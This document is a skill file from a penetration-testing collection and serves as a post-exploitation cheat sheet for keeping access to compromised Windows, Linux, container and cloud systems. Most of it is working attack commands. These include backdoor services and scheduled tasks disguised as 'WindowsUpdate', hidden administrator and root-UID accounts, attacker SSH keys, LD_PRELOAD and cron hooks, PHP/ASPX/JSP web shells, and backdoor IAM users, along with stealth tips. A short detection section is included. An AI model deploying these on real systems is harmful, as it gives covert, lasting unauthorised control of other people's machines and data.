establishing-persistence
Installation
SKILL.md
Establishing Persistence
When to Use
- Maintaining access to compromised systems
- Post-exploitation techniques
- Red team operations
- Persistence testing
- Backdoor creation
Windows Persistence
Registry Run Keys
# HKCU Run (current user)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# HKLM Run (all users - requires admin)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# RunOnce (runs once then deletes)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# Policies Run
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
PowerShell Registry:
# HKCU Run
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Backdoor" -Value "C:\Windows\Temp\backdoor.exe" -PropertyType String
# Verify
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Scheduled Tasks
# Create task to run at logon
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\backdoor.exe" /sc onlogon /ru System
# Run every hour
schtasks /create /tn "SystemCheck" /tr "C:\Windows\Temp\backdoor.exe" /sc hourly /ru System
# Run daily at specific time
schtasks /create /tn "Maintenance" /tr "C:\Windows\Temp\backdoor.exe" /sc daily /st 09:00 /ru System
# Run on system startup
schtasks /create /tn "StartupTask" /tr "C:\Windows\Temp\backdoor.exe" /sc onstart /ru System
# List tasks
schtasks /query /fo LIST /v
PowerShell Scheduled Task:
$action = New-ScheduledTaskAction -Execute "C:\Windows\Temp\backdoor.exe"
$trigger = New-ScheduledTaskTrigger -AtLogon
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "WindowsUpdate" -Description "System Maintenance"
Windows Services
# Create new service
sc create "WindowsUpdate" binPath= "C:\Windows\Temp\backdoor.exe" start= auto
sc description "WindowsUpdate" "Keeps your Windows system updated"
# Start service
sc start "WindowsUpdate"
# Modify existing service
sc config "ServiceName" binPath= "C:\Windows\Temp\backdoor.exe"
# Service with SYSTEM privileges
sc create "SecurityUpdate" binPath= "C:\Windows\Temp\backdoor.exe" start= auto obj= LocalSystem
PowerShell Service:
New-Service -Name "WindowsDefender" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -DisplayName "Windows Defender Update" -StartupType Automatic
Start-Service "WindowsDefender"
WMI Event Subscription
# Create WMI event to run payload on logon
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
Name = "UserLogon";
EventNamespace = "root\cimv2";
QueryLanguage = "WQL";
Query = "SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession'";
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{
Name = "RunBackdoor";
CommandLineTemplate = "C:\Windows\Temp\backdoor.exe";
}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{
Filter = $Filter;
Consumer = $Consumer;
}
Startup Folder
# Current user startup
copy backdoor.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe"
# All users startup (requires admin)
copy backdoor.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe"
DLL Hijacking
# Place malicious DLL in application directory
# Common DLL hijacking candidates:
# - version.dll
# - wlbsctrl.dll
# - oci.dll
copy evil.dll "C:\Program Files\Application\version.dll"
Image File Execution Options
# Hijack executable launch
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe"
# Now pressing Shift 5 times at login opens cmd.exe
AppInit_DLLs
# Load DLL into every process (requires admin)
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\Windows\Temp\evil.dll"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1
Backdoor Accounts
# Create hidden admin account
net user backdoor P@ssw0rd /add
net localgroup Administrators backdoor /add
# Hide account (ends with $)
net user backdoor$ P@ssw0rd /add
net localgroup Administrators backdoor$ /add
# Disable account logging
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v backdoor /t REG_DWORD /d 0
Linux Persistence
Cron Jobs
# User crontab (no sudo needed)
crontab -e
# Add:
@reboot /tmp/.backdoor
0 * * * * /tmp/.backdoor # Every hour
# System-wide cron (requires root)
echo "@reboot root /tmp/.backdoor" >> /etc/crontab
# Cron.d directory
echo "* * * * * root /tmp/.backdoor" > /etc/cron.d/backdoor
# Daily/hourly cron scripts
cp backdoor.sh /etc/cron.daily/update
chmod +x /etc/cron.daily/update
Systemd Services
# Create service file
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=/tmp/.backdoor
Restart=always
[Install]
WantedBy=multi-user.target
EOF
# Enable and start
systemctl daemon-reload
systemctl enable backdoor.service
systemctl start backdoor.service
# Verify
systemctl status backdoor.service
RC Scripts (Init.d)
# Create init script
cat > /etc/init.d/backdoor << EOF
#!/bin/bash
### BEGIN INIT INFO
# Provides: backdoor
# Required-Start: \$network
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
### END INIT INFO
/tmp/.backdoor &
EOF
chmod +x /etc/init.d/backdoor
update-rc.d backdoor defaults
SSH Keys
# Add attacker's public key
mkdir -p /root/.ssh
echo "ssh-rsa AAAA...attacker_key" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# For specific user
echo "ssh-rsa AAAA...attacker_key" >> /home/user/.ssh/authorized_keys
.bashrc / .bash_profile
# Add to user's .bashrc
echo "/tmp/.backdoor &" >> ~/.bashrc
echo "/tmp/.backdoor &" >> ~/.bash_profile
# Root .bashrc
echo "/tmp/.backdoor &" >> /root/.bashrc
LD_PRELOAD
# Hijack library loading
echo "/tmp/evil.so" > /etc/ld.so.preload
# Will load evil.so into every process
MOTD Backdoor
# Add to message of the day scripts (runs on SSH login)
echo "/tmp/.backdoor &" >> /etc/update-motd.d/00-header
chmod +x /etc/update-motd.d/00-header
APT/Package Manager
# APT hook (Debian/Ubuntu)
cat > /etc/apt/apt.conf.d/99backdoor << EOF
APT::Update::Pre-Invoke {"/tmp/.backdoor &";};
EOF
# Runs before apt update
Git Hooks
# If git repositories exist
echo "/tmp/.backdoor &" > /path/to/repo/.git/hooks/post-checkout
chmod +x /path/to/repo/.git/hooks/post-checkout
# Triggers on git checkout
Backdoor Accounts
# Create backdoor user with root UID
useradd -u 0 -o -g 0 -M -d /root -s /bin/bash backdoor
echo "backdoor:P@ssw0rd" | chpasswd
# Or add to /etc/passwd directly
echo "backdoor:x:0:0::/root:/bin/bash" >> /etc/passwd
echo "backdoor:$(openssl passwd -6 P@ssw0rd):::::::" >> /etc/shadow
PAM Backdoor
# Add to /etc/pam.d/sshd or /etc/pam.d/common-auth
# Use custom PAM module that accepts magic password
auth sufficient pam_unix.so try_first_pass
auth sufficient /lib/security/pam_backdoor.so
Web Shells
PHP Web Shell
<?php
// simple.php
system($_GET['cmd']);
?>
// Advanced
<?php
if($_GET['key'] == 'secret') {
eval($_POST['cmd']);
}
?>
Upload Locations:
# Web roots
/var/www/html/
/var/www/
/usr/share/nginx/html/
C:\inetpub\wwwroot\
# Hidden names
.htaccess.php
favicon.ico.php
robots.txt.php
ASP/ASPX Web Shell
<%@ Page Language="C#" %>
<%
Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c " + Request["cmd"]).StandardOutput.ReadToEnd());
%>
JSP Web Shell
<%
Runtime.getRuntime().exec(request.getParameter("cmd"));
%>
Container Persistence
Docker:
# Modify container to restart always
docker update --restart=always container_name
# Add to docker-compose.yml
restart: always
# Create new container with backdoor
docker run -d --restart=always --name backdoor evil_image
Kubernetes:
# DaemonSet (runs on all nodes)
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: backdoor
spec:
selector:
matchLabels:
name: backdoor
template:
metadata:
labels:
name: backdoor
spec:
containers:
- name: backdoor
image: attacker/backdoor:latest
Cloud Persistence
AWS
# Create IAM user
aws iam create-user --user-name backdoor
# Attach admin policy
aws iam attach-user-policy --user-name backdoor --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# Create access key
aws iam create-access-key --user-name backdoor
# Lambda function persistence
# Create Lambda that executes periodically via CloudWatch Events
Azure
# Create service principal
az ad sp create-for-rbac --name "backdoor" --role Contributor
# Create managed identity
az identity create --name backdoor --resource-group RG
# Function App persistence
# Deploy Azure Function that runs on schedule
Rootkits
User-mode Rootkit:
- Hook library functions
- Process hiding
- File hiding
- Network hiding
Kernel-mode Rootkit:
- Loadable kernel module (LKM)
- Hooks system calls
- Harder to detect
- Requires root
# Example LKM (requires kernel headers)
# Compile and load malicious kernel module
insmod backdoor.ko
Persistence Detection
Windows:
# Check Run keys
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
# Check scheduled tasks
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft*"}
# Check services
Get-Service | Where-Object {$_.StartType -eq "Automatic"}
# Check WMI subscriptions
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
Linux:
# Check cron jobs
crontab -l
ls -la /etc/cron.*
cat /etc/crontab
# Check systemd services
systemctl list-unit-files --type=service --state=enabled
# Check init scripts
ls -la /etc/init.d/
# Check SSH authorized_keys
cat ~/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
# Check LD_PRELOAD
cat /etc/ld.so.preload
# Check for hidden files
find / -name ".*"
OpSec Tips
- Blend in - Use system-like names (WindowsUpdate, SystemCheck)
- Redundancy - Establish multiple persistence methods
- Stealth - Avoid noisy methods that generate logs
- Cleanup - Remove persistence when engagement ends
- Timestamps - Match file timestamps to system files
Tools
- PowerSploit - PowerShell post-exploitation
- Empire - Post-exploitation framework
- Metasploit - Persistence modules
- SILENTTRINITY - Modern C2 framework
- Covenant - .NET C2 framework
References
Related skills
More from trilwu/secskills
attacking-wireless-networks
Attack WiFi networks using WPA/WPA2 cracking, WPS exploitation, Evil Twin attacks, deauthentication, and wireless reconnaissance. Use when pentesting wireless networks or performing WiFi security assessments.
18testing-web-applications
Test web applications for security vulnerabilities including SQLi, XSS, command injection, JWT attacks, SSRF, file uploads, XXE, and API flaws. Use when pentesting web apps, analyzing authentication, or exploiting OWASP Top 10 vulnerabilities.
17cracking-passwords
Crack password hashes using hashcat/john, perform password spraying, brute force authentication, and execute pass-the-hash attacks. Use when cracking credentials or performing password-based attacks.
17testing-apis
Test REST and GraphQL APIs for authentication bypasses, authorization flaws, IDOR, mass assignment, injection attacks, and rate limiting issues. Use when pentesting APIs or testing microservices security.
16performing-reconnaissance
Perform OSINT, subdomain enumeration, port scanning, web reconnaissance, email harvesting, and cloud asset discovery for initial access. Use when gathering intelligence or mapping attack surface.
16transferring-files
Transfer files between systems using HTTP, SMB, FTP, netcat, base64 encoding, and living-off-the-land techniques for both Linux and Windows. Use when moving tools or exfiltrating data.
14